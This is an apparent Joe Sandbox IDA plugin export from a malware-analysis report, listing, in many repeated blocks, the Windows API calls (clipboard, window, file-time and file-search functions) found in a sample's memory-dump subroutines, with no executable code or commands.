      • Part of subcall function 00435750: SetWindowLongA.USER32(00000000,000000EC,00000000), ref: 004358D6
      • Part of subcall function 00435750: SetLayeredWindowAttributes.USER32(00000000,00000000,00000000,00000002), ref: 004358E2
      • Part of subcall function 00435750: _strncpy.LIBCMT ref: 004358F8
      • Part of subcall function 00435750: SetWindowLongA.USER32(00000000,000000EC,00000000), ref: 00435981
      • Part of subcall function 00435750: SetLayeredWindowAttributes.USER32(00000000,?,00000000,00000001), ref: 0043598F
      • Part of subcall function 00435750: GetWindowLongA.USER32(00000000,00000000), ref: 004359BB
      • Part of subcall function 00435750: SetLastError.KERNEL32(00000000,00000013,?,00000001,00000000,00000000,00000000,00000000,00000013), ref: 00435A14
      • Part of subcall function 00435750: SetWindowLongA.USER32(?,?,00000000), ref: 00435A1D
      • Part of subcall function 00435750: GetLastError.KERNEL32(?,?,00000000,?,00000001,00000000,00000000,00000000,00000000,00000013), ref: 00435A27
      • Part of subcall function 00435750: GetWindowLongA.USER32 ref: 00435A33
      • Part of subcall function 00435750: SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000037), ref: 00435A4A
      • Part of subcall function 00435750: InvalidateRect.USER32(?,00000000,00000001), ref: 00435A55
      • Part of subcall function 00435750: EnableWindow.USER32(?,00000000), ref: 00435AC0
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
      • Part of subcall function 00440FC0: FindFirstFileA.KERNEL32(004987E9,?), ref: 00440FEB
      • Part of subcall function 00440FC0: GetLastError.KERNEL32(?,?), ref: 00440FF6
      • Part of subcall function 00440FC0: FindClose.KERNEL32(00000000), ref: 00441034
      • Part of subcall function 00440FC0: FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0044108D
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
      • Part of subcall function 00441700: CreateFileA.KERNEL32(?,00000080,00000007,00000000,00000003,00000000,00000000), ref: 0044173A
      • Part of subcall function 00441700: GetFileSizeEx.KERNEL32(00000000,?,?,00000080,00000007,00000000,00000003,00000000,00000000), ref: 0044174D
      • Part of subcall function 00441700: CloseHandle.KERNEL32(00000000), ref: 00441756
      • Part of subcall function 00441700: FindFirstFileA.KERNEL32(?,00000000,?,00000080,00000007,00000000,00000003,00000000,00000000), ref: 00441766
      • Part of subcall function 00441700: GetLastError.KERNEL32(?,00000000,?,00000080,00000007,00000000,00000003,00000000,00000000), ref: 00441771
      • Part of subcall function 00441700: FindClose.KERNEL32(00000000,?,00000000,?,00000080,00000007,00000000,00000003,00000000,00000000), ref: 004417AD
      • Part of subcall function 00441700: __alldiv.INT64 ref: 0044181B
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 00433EA0: GetWindowRect.USER32(00000000,?), ref: 00433F6A
      • Part of subcall function 00433EA0: GetWindowRect.USER32(00000000,?), ref: 00433F72
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 0045AB20: GetClientRect.USER32(00000000,?), ref: 0045ACF2
      • Part of subcall function 0045AB20: __Stoull.NTSTC_LIBCMT ref: 0045AD71
      • Part of subcall function 0045AB20: IsWindowVisible.USER32 ref: 0045B026
      • Part of subcall function 0045AB20: GetWindowRect.USER32(?,?), ref: 0045B039
      • Part of subcall function 0045AB20: MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0045B050
      • Part of subcall function 0045AB20: InvalidateRect.USER32(?,?,00000001), ref: 0045B061
      • Part of subcall function 0045AB20: SendMessageA.USER32(?,0000014E,000000FF,00000000), ref: 0045B225
      • Part of subcall function 0045AB20: SetWindowTextA.USER32(?,001B2FD0), ref: 0045B230
      • Part of subcall function 0045AB20: SendMessageA.USER32(-0000130A,-0000130A,00000000,00000000), ref: 0045B274
      • Part of subcall function 0045AB20: SendMessageA.USER32(00000184,00000184,00000000,00000000), ref: 0045B28A
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 00433FF0: GetWindowThreadProcessId.USER32 ref: 0043403D
      • Part of subcall function 00433FF0: GetGUIThreadInfo.USER32(00000000), ref: 00434044
      • Part of subcall function 00433FF0: GetClassNameA.USER32(00000030,?,000000FC), ref: 00434067
      • Part of subcall function 00433FF0: EnumChildWindows.USER32(00000000,00434140,?), ref: 00434089
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
